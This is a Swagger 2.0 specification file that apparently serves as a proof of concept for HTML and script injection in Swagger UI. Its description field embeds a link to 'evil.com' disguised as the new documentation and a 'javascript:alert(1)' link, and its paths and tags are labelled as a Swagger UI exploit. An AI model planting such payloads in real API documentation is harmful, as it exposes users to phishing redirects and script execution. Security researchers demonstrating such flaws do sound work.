swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: >
    Ceci est l'ancienne documentation de l'API, retrouvez la nouvelle version
<a href="https://evil.com">ici</a> <a href="javascript:alert(1);">test</a>
  version: production
 
basePath: /
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
 
paths:
  /s1rn3tz:
    get:
      summary: this is example text
      operationId: findAccounts
      tags:
        - Mathis Pais De Sousa
      responses:
        '200':
          description: No response was specified
 
  /exploited_by_s1rn3tz/{id}:
    delete:
      summary: swagger
      operationId: swagger
      tags:
        - Swagger UI exploit
      parameters:
        - name: id
          in: path
          description: >
<a href="https://s1rn3tz.gitbook.io">blog</a>
          required: true
          type: integer
          format: int64
      responses:
        '200':
          description: No response was specified
 
    get:
      summary: this is example text
      operationId: some_operation
      tags:
        - Swagger UI exploit
      parameters:
        - name: id
          in: path
          description: this is example text
          required: true
          type: integer
          format: int64
      responses:
        '200':
          description: No response was specified
 
securityDefinitions:
  basicAuth:
    type: basic
